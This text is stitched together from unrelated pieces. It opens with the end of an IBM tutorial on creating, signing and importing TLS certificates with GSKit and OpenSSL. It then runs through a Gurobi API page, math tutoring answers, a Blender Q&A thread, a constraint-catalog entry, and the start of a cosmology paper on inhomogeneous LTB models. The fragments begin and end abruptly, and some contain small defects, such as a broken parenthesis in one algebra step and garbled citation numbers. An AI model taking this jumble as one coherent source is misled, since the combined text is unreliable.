gsk8capicmd -keydb -create -db ca.kdb -pw mypass -stash
gsk8capicmd -cert -create -db ca.kdb -stashed -dn CN=CA,O=CA,C=US -expire 7300 -label "CA cert" -default_cert yes
The -db parameter specifies the file name to be used for the CA's key database file. The -pw parameter specifies the password to use to protect the key database file. The -expire parameter specifies the number of days before the certificate expires. The -dn parameter specifies the distinguished name to use on the CA certificate. The -label parameter specifies the name to be used for the CA certificate in the key database file.
2. Extract the CA's root certificate. This certificate must be installed at both the clients and servers:
gsk8capicmd -cert -extract -db ca.kdb -stashed -label "CA cert" -format ascii -target ca.arm
The -db parameter specifies the file name of the CA's key database file. The -label parameter specifies the CA's certificate label in the key database file. The -target parameter specifies the file that is stored in the exported CA certificate.
### Issuing a server certificate with a CA
For clients to verify a server's identity, the CA must issue a signed server certificate to the server.
1. The CA's root certificate must be added to the server's key database and marked as trusted, as follows:
gsk8capicmd -cert -add -db server.kdb -stashed -label "My CA root" -file ca.arm -format ascii -trust enable
The -db parameter specifies the name of the server's key database file. The -label parameter specifies the label to use for the CA's root certificate in the database file. The -file parameter specifies the file that contains the CA's root certificate.
2. At the server, create a server certificate request as follows:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "My CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -file cert_request.arm
The -db parameter specifies the name of the server's key database file. The -label parameter specifies the label to use for the server certificate in the key database file. The -dn parameter specifies the distinguished name to use on the certificate. The CN parameter specifies the DNS name of your server, which is necessary for an SSL client to validate the certificate.
You can also request a subject alternative name (SAN) extension by using -san_dnsname or -san_ipaddr options (not supported in version 7). For example:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "My CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -san_dnsname "host1.mycompany.com,host2.mycompany.com" -san_ipaddr "10.10.10.1,10.10.10.2" -file cert_request.arm
3. The certificate request must be transported to the CA, and the CA must sign the certificate as follows:
gsk8capicmd -cert -sign -file cert_request.arm -db ca.kdb -stashed -label "CA cert" -target cert_signed.arm -expire 364
The -file parameter specifies the file that contains the certificate request. The -db parameter specifies the name of the CA's key database file. The -label parameter specifies the label of the CA's root certificate that should be used to sign the certificate request. The -target parameter specifies the file to be used for the signed server certificate.
If a SAN extension was requested in the server certificate request, you can either use the -preserve option to keep the requested values or override them by specifying your own -san_dnsname or -san_ipaddr options with the -sign command (not supported in version 7). If you use both -preserve with -san_dnsname or -san_ipaddr, the values are merged with the ones requested. For example:
gsk8capicmd -cert -sign -file cert_request.arm -db ca.kdb -stashed -label "CA cert" -target cert_signed.arm -expire 364 -preserve -san_dnsname "host3.mycompany.com" -san_ipaddr "10.10.10.3"
Note: At the time of this writing (GSKit version 8.0.14.22), there is a bug that generates invalid extensions when both -preserve and -san_dnsname or -san_ipaddr options are used. This bug prevents servers from receiving certificates that are signed with this combination of options. Avoid using -preserve until this problem is fixed.
4. The server must receive the signed certificate from the CA and set it as the default for communicating with clients as follows:
gsk8capicmd -cert -receive -db server.kdb -stashed -file cert_signed.arm -default_cert yes
The -db parameter specifies the name of the server's key database file. The -file parameter specifies the name of the file that contains the signed server certificate.
### Distributing the CA root certificate to clients
For your clients to validate the signed certificate that they receive from the server during an SSL connection, they must trust your Certificate Authority. This is achieved by installing the CA root certificate on the clients.
1. Transfer the CA root certificate to clients. (See the ca.arm file created above.)
2. Add the CA root certificate to the client key database and enable trust as follows:
gsk8capicmd -cert -add -db client.kdb -stashed -label "My CA root" -file ca.arm -format ascii -trust enable
The -db parameter specifies the client's key database file to store the CA's root certificate. The -file parameter specifies the file that contains the CA's root certificate.
## Using a third-party Certificate Authority
### Install the CA root certificate
Instead of setting up its own certificate authority, a company may use a third-party certificate authority to sign its server certificates. The client and server must have access to the third-party CA's root certificate to verify the server certificates that are signed by the third-party CA.
GSKit ships with a collection of third-party root certificates from well-known CA companies, such as Thawte, Verisign, and Entrust. If the server is going to use one of these well-known companies to sign its certificates, this step can be skipped. But if the server is going to use certificates from a third-party CA whose root certificate is not shipped with GSKit, the third-party CA's root certificate must be imported to both the server and the clients' key database files as follows:
1. Obtain the CA root certificate. The process for this varies depending on the third-party CA's procedures. Third-party CAs often make their root certificates available for download.
2. Add the third-party's root CA certificate to both server and client key databases and mark it as trusted as follows:
gsk8capicmd -cert -add -db server.kdb -stashed -label "Some CA root" -file ca.der -format binary -trust enable
gsk8capicmd -cert -add -db client.kdb -stashed -label "Some CA root" -file ca.der -format binary -trust enable
This example uses a third-party CA root certificate that is in a binary format. If the certificate is in an ASCII format, use the -format ascii option. The -db parameter specifies the name of the key database to import the third-party CA root certificate into. The -label parameter specifies the label to use for the third-party CA root certificate inside the key database file. The -file parameter specifies the file that contains the third-party CA root certificate.
### Requesting a certificate using a signing request
In this scenario, GSKit creates a certificate request, the third-party CA signs the certificate in the request, and GSKit imports the signed certificate into the server key database.
1. Generate a server certificate request using the server's key database file:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "Some CA signed certificate" -dn "CN=host.mycompany.com,O=company,C=country" -file cert_request.arm
The -db parameter specifies the name of the server's key database file. The -label parameter specifies a label to refer to the newly created certificate in the key database file. The -dn parameter specifies the distinguished name to be used on the server's certificate. The -file parameter specifies the file to contain the exported certificate signing request. The CN parameter specifies the DNS name of your server. This is necessary for an SSL client to validate the certificate.
You can also request SAN extension by using -san_dnsname or -san_ipaddr options (not supported in version 7). For example:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "Some CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -san_dnsname "host1.mycompany.com,host2.mycompany.com" -san_ipaddr "10.10.10.1,10.10.10.2" -file cert_request.arm
2. Send the certificate request (that is, the cert_request.arm file) to the CA. The process for submitting a certificate signing request varies among CA companies. Often the signing request can be submitted using a web form.
3. The CA then returns the signed certificate. In this scenario, the assumption is that the signed certificate is in a file that is called cert_signed.arm and is in an ASCII format.
4. Receive the signed certificate into the server's key database file and set it as the default for communicating with clients:
gsk8capicmd -cert -receive -db server.kdb -stashed -file cert_signed.arm -default_cert yes
The -db parameter specifies the name of the server's key database file. The -file parameter specifies the name of the file that contains the signed certificate.
### Requesting a certificate without a signing request
Some Certificate Authorities do not accept signing request files. Instead, they generate the signing request internally on behalf of the requesting server and then sign it as one transaction. The CA then returns to the server two files, one containing the private key for the server to use and one containing the signed server certificate. In this example, the assumption of the two files is as follows:
• host.mycompany.com.crt: This is the file that contains the signed server certificate.
• host.mycompany.com.key: This is the file that contains the server's private key
To use these files, they must be converted to an industry standard format called PKCS12 before they can be imported into a key database.
1. Use OpenSSL to convert the two files into a PKCS12 file as follows:
openssl pkcs12 -export -in host.mycompany.com.crt -inkey host.mycompany.com.key -out host.mycompany.com.p12 -name "CA signed"
The OpenSSL command prompts you to enter a password. This password is only used temporarily so it can be any arbitrary password. In this example, the password is set to abc. The -in parameter specifies the file that contains the signed server certificate. The -inkey parameter specifies the file that contains the server's private key.
2. Import the certificate from the PKCS12 file to the server's key database file as follows:
gsk8capicmd -cert -import -db host.mycompany.com.p12 -pw abc -target server.kdb
The -db parameter specifies the name of the PKCS12 file. The -pw parameter specifies the password that protects the PKCS12 file. The -target parameter specifies the name of the server's key database file. You are prompted for the password that protects the target database file.
3. Make the imported certificate the default certificate to use for communications as follows:
gsk8capicmd -cert -setdefault -db server.kdb -stashed -label "CA signed"
The -db parameter specifies the name of the server's key database file. The -label parameter specifies a label of the imported certificate.
## GSKit security considerations
### Protecting private keys
If an attacker obtains access to the private keys the associated certificates can't be trusted, compromising the servers that depend on them. You can help protect the key database file by:
• Protecting the stored password file (the .sth file) using the file system's security mechanisms if you use the GSKit stashed password feature. For example, you can set the file permissions to restrict access to this file to certain users.
• Restricting file system access to the key database file (the .kdb file) so that it is only readable by the users that run an application that uses the key database.
### Verifying the identity of certificate requesters
If you manage your own Certificate Authority, you must ensure that any certificate signing request comes from an identity that is authorized to access the resource the requested certificate is for. The trustworthiness of certificates issued by the Certificate Authority is only as good as the process used to verify the identity of the requester.
## Tips and tricks
### Listing key database contents
To get a short list (labels only) of all certificates in a key database, use the following command:
gsk8capicmd -cert -list -db server.kdb -stashed
The -db parameter specifies the name of the key database file.
To get detailed information about a particular certificate, use the following command:
gsk8capicmd -cert -details -db server.kdb -stashed -label "My certificate"
In this command, the -db parameter specifies the name of the key database file. The -label parameter specifies the label of the certificate in the database.
### Switching between certificates
A server's key database file can have multiple server certificates in it. However, only one certificate, which is known as the default certificate, can be used by the server at a time. You can change which certificate is the default certificate using the following command:
gsk8capicmd -cert -setdefault -db server.kdb -stashed -label <certificate's label>
In this command, the -db parameter specifies the name of the server's key database file. The -label parameter specifies the label of the certificate to make the default.
Because client key database files have only the server certificates in them and no private keys, none of the certificates in a client key database can be set as the default.
### Verifying the server certificate
#### Verifying the server certificate using a browser
If your GSKit key database file is being used to implement SSL on a web server, connect to the server with a web browser using an https://server:port syntax. You may get a security warning if your browser doesn't have the signing CA certificate or the self-signed certificate that is used by the server. But most browsers let you display information about the certificate currently being used by the server.
#### Verifying the server certificate using OpenSSL
1. Connect to the server and display the certificates using the -showcerts parameter of the OpenSSL as follows:
openssl s_client -connect server:port
The -connect parameter specifies the server domain name and the port that the server is listening on.
2. From the command's output, copy everything from "BEGIN CERTIFICATE" to "END CERTIFICATE," including those two lines. In this example, assume the command output is copied to a file called server.cert.
3. Use OpenSSL to display the certificate as follows:
openssl x509 -in server.cert -noout -text
The -in parameter specifies the name of the file that contains the output from the -showcerts command.
If you add the -showcerts option in step 1, you get the full certificate chain. You can repeat steps 2 and 3 for each certificate in the chain to analyze them.
## Resources
### Get products and technologies
• OpenSSL is an open source project for implementing the SSL/TLS protocols and has certificate management tools that are referenced in this tutorial.
## Dig deeper into Security on developerWorks
• ### Bluemix Developers Community
Get samples, articles, product docs, and community resources to help build, deploy, and manage your cloud apps.
• ### developerWorks Labs
Experiment with new directions in software development.
• ### DevOps Services
Software development in the cloud. Register today to create a project.
• ### IBM evaluation software
Evaluate IBM software and solutions, and transform challenges into opportunities.
static.content.url=http://www.ibm.com/developerworks/js/artrating/
SITE_ID=1
Zone=Security
ArticleID=843404
ArticleTitle=Managing certificates with IBM GSKit
publish-date=11062012 |
# GRBModel.GetTuneResult()
Filter Content By
Version
Languages
### GRBModel.GetTuneResult()
Use this method to retrieve the results of a previous Tune call. Calling this method with argument n causes tuned parameter set n to be copied into the model. Parameter sets are stored in order of decreasing quality, with parameter set 0 being the best. The number of available sets is stored in attribute TuneResultCount.
Once you have retrieved a tuning result, you can call optimize to use these parameter settings to optimize the model, or write to write the changed parameters to a .prm file.
Please refer to the parameter tuning section for details on the tuning tool.
void GetTuneResult ( int n )
n: The index of the tuning result to retrieve. The best result is available as index 0. The number of stored results is available in attribute TuneResultCount. |
For your first one, which set of lines are you referring to? The two yellow line segments are the same because they are both radii of the circle, and the two white segments are the same because, as Professor Loh said, you can apply the Pythagorean Theorem!
Similar triangles are very different from congruent triangles. Two triangles are congruent if they are exactly the same! (Though, it still counts if it's "flipped"). The important thing about congruent triangles is that they share the exact same side lengths and angles. This is very useful: If we can figure out that two triangles are congruent, then we may be able to deduce that two angles are the same, or perhaps that two side lengths are the same!
On the other hand, similar triangles don't have as much in common as congruent triangles. Similar triangles only need the same angles. A good way to think about what triangles count as similar is this: If you draw a triangle, and draw the "same" triangle but 3 times smaller, you will have two triangles that both "look" the same, but they aren't congruent because the second triangle has sides that are three times smaller. But, they will actually be similar!
Finally let's get to your last question, an algebra question! Why is it that:
$$\sqrt{2} \times \sqrt{4} = 2 \times \sqrt{2}?$$
Try not to overthink this! We know that $$\sqrt{4} = 2$$, so $$\sqrt{2} \times \sqrt{4} = \sqrt{2} \times 2 = 2 \times \sqrt{2}$$.
Though, in the future, dealing with radicals might be tricky! For example, how might you simplify this?
$$\sqrt{8} \times \sqrt{12}$$
Here's one approach: First we can combine the radicals together:
$$\sqrt{8} \times \sqrt{12} = \sqrt{8 \times 12}$$
Now, look for perfect squares you can separate it into, so you can take them out!
$$\sqrt{8 \times 12} = \sqrt{4 \times 2 \times 12} = \sqrt{4 \times 4 \times 6} = \sqrt{4} \times \sqrt{4} \times \sqrt{6} = \boxed{4\sqrt{6}}$$ |
# Linking object data without changing rotation?
I have multiple objects that I would like to all use the same mesh but maintain their individual rotation positions. As it is, when I link their object data, all the objects rotate to the same position as the object I'm linking the data from.
Is there any way do this without having to go around and manually re-rotate all the linked objects back to their original rotation positions?
Thanks!
• "when I link their object data, all the objects rotate to the same position" No they don't, what happens is your current objects have no rotation transformations or have their rotations applied, so when you link object data they inherit the other object's shape, giving the impression of rotating themselves. Sad part is there is no easy way to fix this other manually realign them one by one. May 9, 2017 at 18:27
• @DuarteFarrajotaRamos - Thanks. I was afraid this might be the case but I was hoping someone had a way of doing it. May 9, 2017 at 19:13
• I am aware of the problem, but know of any way to fix this easily/quickly. Is this imported data from other application? Your best bet would probably be using other import file format that supports instancing and/or transforms. I am blindly guessing this was imported from OBJ, maybe try FBX which correctly interprets clones. May 9, 2017 at 23:45
• I don't know if this works for you or if it is "too manual" but you could perhaps previously create a "marker" for each object that you need to "remember" original transforms later. It could be anything from an object duplicate (maybe in another layer) or an empty. Then after you link the desired object data, if they loose their original transform, you can always make them use a "copy tranform" constraint to get their original transform settings, then apply that using "apply > visual tranforms" May 10, 2017 at 12:25
The best way is to Create a Collection with the Object to distribute, then Add Collection Instances (Shift+A > Collection Instance) to the Scene and randomly place, I suggest Proportional Editing (O).
In this set-up, if you modify the original object, the other ones change accordingly + since it is a Collection Instance, it retains the Transformation Data (cannot be accidentaly applied)
Good Luck!
I ran into this problem today and found a solution. It requires a few manual steps though but it is not too bad. I have 6 objects with different orientations and whose mesh data i want to link to one Reference Object
First select all the objects to be linked & press CTRL+A to apply Rotation to all objects to be linked
Set Object Transform Option to Affects Origins
Make sure the Face Orientation Normals are correct, everything should be blue. If something is red, fix it by going into Edit Mode and press A to select all faces and press SHIFT+N to recalculate normals outside.
Set Snapping Mode to Face and set the other settings as shown below
STEPS FOR EACH OBJECT TO BE LINKED:
Then choose any surface you want your origin to orient to; I chose the circular top of the cylinder. Drag the origin by pressing G and snap it anywhere on that surface by holding CTRL while moving across the surface normal. It doesn't need to be perfectly centered because we will snap the origin perfectly in the center in the next step. The Z-axis will align perpendicularly outwards of that snapped surface.
Press TAB to go to Edit Mode and click select the chosen surface normal you snapped the origin onto and press SHIFT+S > Cursor to Selected
Then press TAB again to go back to Object Mode and press SHIFT+S > Selection to Cursor
Now you have the origin nicely centered and aligned with the objects local orientation. Do these steps for every object including the Reference Object you want to link to so that all objects have the same orientation.
Then you can select all objects to be linked and SHIFT select the Reference Object last to make it the Active Selection and press CTRL+L > Link Object Data
Create duplicates, rotate them as you wish, then simply substitute the original mesh in the mesh data menu, creating multiple instances. Transformation is not affected.
• Hi, thanks for the post. This site is not a regular forum, answers should be substantial, stand on their own, and thoroughly explain the solution and procedure. One liners and short tips rarely make for a good answer. If you can, please edit your post and provide some more details about the workflow and how it works. Perhaps add a few images illustrating some steps and final result. See How to write a good answer? Jul 8 at 21:32 |
# How do you solve the equation x^2-3x-7=0 by completing the square?
Mar 3, 2018
color(blue)(x = 4.54, -1.54
#### Explanation:
${x}^{2} - 3 x - 7 = 0$
${x}^{2} - \left(2 \cdot \left(\frac{3}{2}\right) \cdot x\right) = 7$
Adding ${\left(\frac{3}{2}\right)}^{2}$ to both sides,
x^2 - (2 * 3/2) * x) + (3/2)^2 = 7 + (3/2)^2 = 37/4
${\left(x - \left(\frac{3}{2}\right)\right)}^{2} = {\left(\sqrt{\frac{37}{4}}\right)}^{2}$
$x = \pm \sqrt{\frac{37}{4}} + \left(\frac{3}{2}\right)$
color(blue)(x= 4.54, -1.54 |
## 5.290. size_max_seq_alldifferent
Origin
N. Beldiceanu
Constraint
$\mathrm{𝚜𝚒𝚣𝚎}_\mathrm{𝚖𝚊𝚡}_\mathrm{𝚜𝚎𝚚}_\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}\left(\mathrm{𝚂𝙸𝚉𝙴},\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}\right)$
Synonyms
$\mathrm{𝚜𝚒𝚣𝚎}_\mathrm{𝚖𝚊𝚡𝚒𝚖𝚊𝚕}_\mathrm{𝚜𝚎𝚚𝚞𝚎𝚗𝚌𝚎}_\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏}$, $\mathrm{𝚜𝚒𝚣𝚎}_\mathrm{𝚖𝚊𝚡𝚒𝚖𝚊𝚕}_\mathrm{𝚜𝚎𝚚𝚞𝚎𝚗𝚌𝚎}_\mathrm{𝚊𝚕𝚕𝚍𝚒𝚜𝚝𝚒𝚗𝚌𝚝}$, $\mathrm{𝚜𝚒𝚣𝚎}_\mathrm{𝚖𝚊𝚡𝚒𝚖𝚊𝚕}_\mathrm{𝚜𝚎𝚚𝚞𝚎𝚗𝚌𝚎}_\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}$.
Arguments
$\mathrm{𝚂𝙸𝚉𝙴}$ $\mathrm{𝚍𝚟𝚊𝚛}$ $\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}$ $\mathrm{𝚌𝚘𝚕𝚕𝚎𝚌𝚝𝚒𝚘𝚗}\left(\mathrm{𝚟𝚊𝚛}-\mathrm{𝚍𝚟𝚊𝚛}\right)$
Restrictions
$\mathrm{𝚂𝙸𝚉𝙴}\ge 0$ $\mathrm{𝚂𝙸𝚉𝙴}\le |\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}|$ $\mathrm{𝚛𝚎𝚚𝚞𝚒𝚛𝚎𝚍}$$\left(\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂},\mathrm{𝚟𝚊𝚛}\right)$
Purpose
$\mathrm{𝚂𝙸𝚉𝙴}$ is the size of the maximal sequence (among all possible sequences of consecutive variables of the collection $\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}$) for which the $\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}$ constraint holds.
Example
$\left(\begin{array}{c}4,〈\begin{array}{c}\mathrm{𝚟𝚊𝚛}-2,\hfill \\ \mathrm{𝚟𝚊𝚛}-2,\hfill \\ \mathrm{𝚟𝚊𝚛}-4,\hfill \\ \mathrm{𝚟𝚊𝚛}-5,\hfill \\ \mathrm{𝚟𝚊𝚛}-2,\hfill \\ \mathrm{𝚟𝚊𝚛}-7,\hfill \\ \mathrm{𝚟𝚊𝚛}-4\hfill \end{array}〉\hfill \end{array}\right)$
The $\mathrm{𝚜𝚒𝚣𝚎}_\mathrm{𝚖𝚊𝚡}_\mathrm{𝚜𝚎𝚚}_\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}$ constraint holds since the constraint $\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}$$\left(〈\mathrm{𝚟𝚊𝚛}-4,\mathrm{𝚟𝚊𝚛}-5,\mathrm{𝚟𝚊𝚛}-2,\mathrm{𝚟𝚊𝚛}-7〉\right)$ holds and since the following three constraints do not hold:
Symmetry
One and the same constant can be added to the $\mathrm{𝚟𝚊𝚛}$ attribute of all items of $\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}$.
Keywords
Arc input(s)
$\mathrm{𝚅𝙰𝚁𝙸𝙰𝙱𝙻𝙴𝚂}$
Arc generator
$\mathrm{𝑃𝐴𝑇𝐻}_𝑁$$↦\mathrm{𝚌𝚘𝚕𝚕𝚎𝚌𝚝𝚒𝚘𝚗}$
Arc arity
$*$
Arc constraint(s)
$\mathrm{𝚊𝚕𝚕𝚍𝚒𝚏𝚏𝚎𝚛𝚎𝚗𝚝}$$\left(\mathrm{𝚌𝚘𝚕𝚕𝚎𝚌𝚝𝚒𝚘𝚗}\right)$
Graph property(ies)
$\mathrm{𝐍𝐀𝐑𝐂}$$=\mathrm{𝚂𝙸𝚉𝙴}$
Graph model
Note that this is an example of global constraint where the arc constraints do not have the same arity. However they correspond to the same type of constraint. |
# Point O
Author: daniyar
Problem has been solved: 98 times
Русский язык | English Language
Let $O$ be a random point on the plane. Points $A$, $B$, and $C$ are chosen on the same plane such that $AO=BO=CO+8=15$ and area of the triangle $ABC$ is maximized. What is the length of the shortest side of the triangle $ABC$? |
## A community for students. Sign up today
Here's the question you clicked on:
## anonymous 5 years ago Use the Triangle Inequality and Mathematical Induction to show that$\left|\sum_{k=1}^{n}a_k\right|\leq\sum_{k=1}^{n}|a_k|.$Well, from the Triangle Inequality, we know that$\left|\sum_{k=1}^{n}a_k\right|=|a_1+a_2+...+a_n|\leq|a_1|+|a_2|+...+|a_n|=\sum_{k=1}^{n}|a_k|,$and by Mathematical Induction, we see that$\left|\sum_{i=1}^{1}a_i\right|=|a_1|=\sum_{i=1}^{1}|a_i|,$assume it's true for $$k$$, and see that$\left|\sum_{i=1}^{k+1}a_i\right|=|a_1+a_2+...+a_{k+1}|\leq|a_1|+|a_2|+...+|a_{k+1}|=\sum_{i=1}^{k+1}|a_i|,$as required.
• This Question is Closed
1. anonymous
Does this seem sound?
2. anonymous
o..m..g..
3. LifeIsADangerousGame
I agree with Hershey_Kisses...
4. anonymous
holy cow! that looks like.....holy cow that unbearable!
#### Ask your own question
Sign Up
Find more explanations on OpenStudy
Privacy Policy |
Research article
Inhomogeneous matter distribution and supernovae
Version 1 Released on 20 May 2016 under Creative Commons Attribution 4.0 International License
1. ICRANet
Abstract
This work investigates a simple inhomogeneous cosmological model within the Lemaître-Tolman-Bondi (LTB) metric. The mass-scale function of the LTB model is taken to be $M(r) \propto r^d$ and would correspond to a fractal distribution for $0<d<3$. The luminosity distance for this model is computed and then compared to supernovae data. Unlike LTB models which have in the most general case two free functions, our model has only two free parameters as the flat standard model of cosmology. The best fit obtained is a matter distribution with an exponent of $d=3.44$ revealing that supernovae data do not favor those fractal models.
Introduction
The discovery that the observed peak luminosity of the IA supernovae (SNe IA) was smaller than the one implied by a $\Lambda=0$ Friedmann-Lema\^{\i}tre-Robertson-Walker (FLRW) model leads most of the scientific community to believe that our Universe was expanding at an increasing rate. To drive this expansion, an unknown perfect fluid $\Lambda$, dubbed dark energy, has been introduced by hand. Indeed a detailed fitting procedure, leads to the conclusion that the best-fit model is a flat FLRW metric filled with dark energy ($68 \%$) and pressureless matter ($32 \%$). This is called the concordance or $\Lambda$CDM model and is widely accepted and taught as the best candidate so far to describe our Universe. The very assumption of the $\Lambda$CDM model is that the geometry of our Universe is described by spatially homogeneous and isotropic spacetimes (called FLRW). Whereas statistical isotropy about our position has been established with a remarkable precision with the cosmic microwave background spectrum (CMB) observations,[1] statistical homogeneity on large scale is hard to probe mainly because it is hard to distinguish a temporal from a spatial evolution on the past light cone (two good reviews: Refs. [2,3]). This motivates to investigate more general spacetimes where the very assumption of statistical homogeneity is relaxed.
In the framework of Einstein's general relativity, a natural way to create an apparent acceleration is to introduce large-scale inhomogeneous matter distribution. This leads to many controversial philosophical debates (see eg. Ref. [4]). It has been shown that the Lemaître-Tolman-Bondi (LTB) [57] metric can successfully fit the dimming of the SNe IA by modeling radial inhomogeneities in a suitable way.[8,9] The fit of mass profiles to various datasets, including SNe, was performed for instance in Ref. [10]. The deduced acceleration of the expansion of the Universe induced by this unknown dark energy would be nothing but a mirage due to light traveling through an inhomogeneous medium, as explained eg. in Ref. [11]. However one caveat to these inhomogeneous LTB models is that under very mild assumptions on regularity and asymptotic behavior of the free functions of the LTB model, any pair of sets of conjugate observational data (for instance the pairs {angular diameter distance, mass density in the redshift space} or {angular diameter distance, expansion rate}) can be reproduced [12,13]. Proposing an alternative to the FLRW model which has so much freedom that it can fit any data sets seems problematic. Hence physical criteria are required to constrain the LTB models.
Then a data analysis is performed with the SNe IA data of Union2.1.[14] The result is that the data favor the flat FLRW model but the parametric LTB model fits also the data reasonably good. We argue that this model is interesting for two reasons. On the one hand, to show that a parametric LTB model can indeed fit SNIa data without dark energy even though it has much less freedom than the full general LTB model. On the other hand, to open the road to perform more broad and robust data analysis to check if indeed those classes of models can explain all the diverse cosmological data (CMB anisotropies and polarization, Integrated Sachs Wolfe effect, light element abundances, Baryon Acoustic Oscillation, Galaxies Surveys...) The paper is divided as follow, in section 2., we propose to discuss some of the theoretical and philosophical challenges for the homogeneous universes. Then we describe in section 3., the main ingredients of our parametric LTB model. The final goal of this section is to obtain an expression for the luminosity distance in the parametric LTB model. Then in section 4., a data analysis is performed to determined if this model can also account for the observed data of the SNe IA. A connection to fractal cosmologies is proposed in section 5.. Some concluding remarks and perspectives are drawn in section 6..
Homogeneity or inhomogeneity?
In this section, we posit some theoretical and philosophical thoughts on the choice of the FLRW metric to describe our Universe.
The observations of the CMB and galaxies surveys advocate for a universe statistically isotropic around us. Within these observations, usually one adds a principle to determine which class of cosmological solutions describes our Universe. The cosmological principle states that the Universe is spatially statistically homogeneous and isotropic. The Copernican principle is weaker and states that no observer has a peculiar position in the Universe. Combined with an isotropy hypothesis, the Copernican principle implies the cosmological principle. The cosmological principle is very ambitious because it conjectures on the geometry of the (possibly) infinite Universe whereas the Copernican principle applies only to the observable universe. Even though "principle" is an appealing wording, it reflects nothing but a confession of lack of knowledge on the matter distribution on large scale. Indeed, homogeneity cannot be directly observed in the galaxy distribution or in the CMB since we observe on the past lightcone and not on spatial hypersurfaces. An interesting study might be to consider this lack of knowledge in the context of the information theory and try to quantify how much information one can extract with idealized measurements and if this permits to draw any cosmological conclusion. Note[11] that FLRW models can only be called Copernician if one considers our spatial position. Considering FLRW models from a fully relativistic point of view: that is considering the observer in the four-dimensional spacetime, the model cannot be called Copernican. Indeed, whereas our position in space is not special, our temporal location is. Within the $\Lambda CDM$ model, this caveat is called the coincidence problem.
FLRW metric is the cosmological solution corresponding to a homogeneous and isotropic spacetime. Of course, the homogeneity and isotropy are valid up to some scale called the isotropic and homogeneity scale. On an epistemological point of view, it is unsatisfactory to have a model for a universe which is homogeneous but does not have any built-in prescription for its scale of homogeneity. A common order of magnitude for the homogeneity scale is hundred of Megaparsec but observations of larger and larger structures are being reported in the past decades (Ref. [15] for a recent example). Many people see them as Black Swan events but they could be more fundamental. It is furthermore interesting to note that the Hubble law is starting to be true when the proper velocity of the galaxy can be neglected ie. around 10 Mpc whereas the homogeneity scale is known to be much above ($\sim 100$ Mpc).
It has also been questioned whether the homogeneity assumption should be applied to Einstein tensor or the metric itself.[16] It is indeed known that in the general case $<G_{\mu \nu}(g_{\mu \nu})> \neq G_{\mu \nu}(<g_{\mu \nu}>)$, where $<...>$ denotes spatial average. This idea is really hard to implement because Einstein's equations are not tensor equations after the averaging procedure (changing from covariant to contravariant indices alters the equations). Then only tensors of rank 0 and scalars would have well behaved average [17]. The consequences of this approach are still unclear [18].
Describing our Universe with a FLRW spacetime does not tackle the so-called "Ricci-Weyl" problem. Ths usual FLRW geometry is characterized by a vanishing Weyl tensor and a non-zero Ricci tensor whereas in reality, it is believed that light is traveling mostly in vacuum where the Ricci tensor vanished and the Weyl is non-zero (see eg. Ref. [19] and references therein for more details). The parametric LTB models described in the next sections would be a possible extension of the Swiss-cheese models described in Ref. [19]. It would break the continuous limit and should reproduce more accurately the actual large-scale structure of our Universe (with voids and filaments).
The problems described previously are mainly gravitating around homogeneity assumption. Our current standard model of cosmology has many puzzling features: some fine-tuning problems, [20] the cosmological constant problem. [21] Inhomogeneous spacetime are less studied so their drawbacks are less known but they could give clues on the above mentioned problems.
LTB model:
The goal of this section is to derive an expression for the luminosity distance in a LTB model. To do so, we will first present some generalities about LTB model and then specify the class of models we will focus on. To connect to observations, the distances in LTB spacetime are presented and the final result for the luminosity distance is shown in Eq. \ref{eq:dl}.
LTB model: generalities
The model describes a spherically symmetric dust distribution of matter. In coordinates comoving with the dust and in synchronous time gauge, the line element of the LTB metric is given by: $$\label{metric} ds^2=dt^2-\frac{R'^2(r,t)}{f^2(r)}dr^2-R^2(r,t) d\Omega^2.$$ Our convention for derivatives are that a prime denotes a derivative with respect to the radial coordinate r and a dot a derivative with respect to cosmological time. $R(r,t)$ is the areal radius function, a generalization of the scale factor in FLRW spacetimes. It also has a geometrical meaning as it can be interpreted as the angular distance, as we will discuss in section 3.2.. $f(r)$ is the energy per unit mass in a comoving sphere and also represents a measure of the local curvature.
The time evolution of the areal radius function is given by the Einstein equation which reads: $$\label{EOM} \frac{\dot{R^2}(r,t)}{2} - \frac{M(r)}{R(r,t)}= \frac{f(r)^2-1}{2},$$ where $M(r)$ is a second free function. After integrating (\ref{EOM}), one will find the third free function of the LTB model, namely $t_B(r)$ which is the bang time for worldlines at radius $r$. One will consider only a small class of LTB solutions. First the equations of the LTB model (\ref{metric}, \ref{EOM}) are invariant under the change of radial coordinate $r \rightarrow r + g(r)$ where $g(r)$ is an arbitrary function. This gives the possibility to choose one of the free function of the LTB model arbitrarily. The assumptions for these solutions are:
• The gauge freedom explained above allows us to choose one unique big-bang : $t_B(r)$ constant.
• We consider parabolic LTB solutions so that the geometry is flat: $f(r)=1$
• The free function $M(r)$ can be interpreted as the cumulative radius of matter inside a sphere of comoving size $r$ [7]. At this point, it is worth noting that a Einstein-de Sitter universe (flat, matter only, FLRW universe) is recovered for $M(r)=M_0 r^3$.
